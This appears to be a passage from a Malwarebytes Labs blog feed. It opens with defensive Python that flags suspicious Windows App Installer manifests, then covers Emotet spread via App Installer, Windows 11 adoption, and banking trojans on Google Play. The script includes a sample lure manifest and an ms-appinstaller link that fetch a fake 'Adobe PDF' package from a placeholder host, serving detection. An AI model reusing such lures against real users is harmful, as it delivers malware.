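    """Parse the manifest and return the package URI, publisher and findings."""
    root = ET.fromstring(xml_text)
    main = root.find("ai:MainBundle", NS)
    if main is None:
        main = root.find("ai:MainPackage", NS)
    if main is None:
        return {"package_uri": None, "publisher": None,
                "findings": ["no MainBundle/MainPackage element"]}
    uri = main.get("Uri", "")
    publisher = main.get("Publisher", "")
    name = main.get("Name", "")
    host = (urlsplit(uri).hostname or "").lower()
    findings = []
    if host not in trusted_hosts:
        findings.append(f"package host {host!r} not in trusted deployment hosts")
    if host.endswith(".web.core.windows.net"):
        findings.append("package served from Azure static website storage, not a vendor domain")
    if "adobe" in name.lower() and "adobe" not in publisher.lower():
        findings.append(f"package name claims Adobe but Publisher is {publisher!r}")
    if root.find("ai:UpdateSettings/ai:OnLaunch", NS) is not None:
        findings.append("OnLaunch update check: the remote host can replace the package later")
    return {"package_uri": uri, "publisher": publisher, "findings": findings}


# Constructed manifest mimicking the 'Adobe PDF Component' lure described above.
SAMPLE_MANIFEST = """<AppInstaller xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2"
              Uri="https://lure-placeholder.web.core.windows.net/AdobePDF.appinstaller"
              Version="1.0.0.0">
  <MainBundle Name="AdobePDFComponent"
              Publisher="CN=Example Publisher, O=Example Ltd"
              Version="1.0.0.0"
              Uri="https://lure-placeholder.web.core.windows.net/AdobePDF.appxbundle" />
  <UpdateSettings>
    <OnLaunch HoursBetweenUpdateChecks="0" />
  </UpdateSettings>
</AppInstaller>
"""

if __name__ == "__main__":
    link = "ms-appinstaller:?source=https://lure-placeholder.web.core.windows.net/AdobePDF.appinstaller"
    print("manifest URL:", extract_source(link))
    report = inspect_appinstaller(SAMPLE_MANIFEST)
    print("package:", report["package_uri"], "publisher:", report["publisher"])
    for finding in report["findings"]:
        print("-", finding)
```

The host allowlist does the real work: a genuine internal deployment always points at a host you control, so any manifest fetched from generic cloud storage fails that check before the icon, the name or the “Trusted App” label gets a chance to persuade anyone.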

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content: not just malicious files, as in the case of Emotet, but also phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone; other content hosting services like Google Drive, Dropbox, and Amazon’s web services are also abused to store malicious content. But critics are hard on Microsoft since it considers itself a security vendor. At the time of writing, the .appinstaller file had been removed, but it was available for download longer than it should have been.

The URL for the .appinstaller returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded into your cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flak because it is its cloud service hosting the malware, its App Installer being used in the process, and its operating system (Windows) being targeted by the attacks. Does that make it an enabler? Not really, and certainly not voluntarily.

Emotet

While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. And using new distribution methods is a clear sign that it is serious about the comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Most people aren’t upgrading to Windows 11: Not the end of the world

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

  1. Old apps: A big reason ancient operating systems like XP still run in organisations is down to old, business critical apps. For most businesses, no one size fits all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how it operates, just how to patch it if something goes wrong. Pulling it out will break lots of business critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about, aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.

The post Most people aren’t upgrading to Windows 11: Not the end of the world appeared first on Malwarebytes Labs.

Have you downloaded that Android malware from the Play Store lately?

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted out for stealing banking data like your username and password, and the two-factor authentication (2FA) codes that you use to log in to your bank account. They are also capable of logging keystrokes on the phone and taking screenshots of what you’re seeing on your phone as you use it. All of this is done without the victim’s consent and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that the Play Store often gets malware—and are therefore quite wary about what they download—these apps actually come with the functions they advertise, further alleviating any doubts in users’ minds about their legitimacy.

But, as users soon realize, the duck test (if it looks and acts like one, it is one) only applies to ducks, because these apps begin to show their true intent after they have been installed.

So, how do these benign apps become fully malicious? The cybercriminals behind them introduce the malicious code as updates to the apps, slowly but surely. It’s a common evasion tactic that gets their app into the Play Store without raising alarms at the door. Note, however, that the update carrying the Trojan code is only pushed to an app when the attackers choose to do so.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed in one device in California, USA and one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.

Code sample taken from the app where attackers can target Android users who are customers of certain financial institutions they are after. This method is used by actors behind the Anatsa campaign. (Source: ThreatFabric)
Attackers can not only pick their victims based on their region. They can also target Android users based on the device they use, a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that, incrementally updating the app, location checking, and device checking are also methods that attackers use to ensure their app is running on actual Android devices and not on a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store. They are Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much they have already stolen from them until they were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, a QR code scanner, searching for “the top QR code scanners” or “the best QR code scanners” may be a good start, as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be fairly confident that they have looked into these apps and tested them themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) with a large user base, and (c) that have been in the Play Store for quite some time (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.

The post Have you downloaded that Android malware from the Play Store lately? appeared first on Malwarebytes Labs.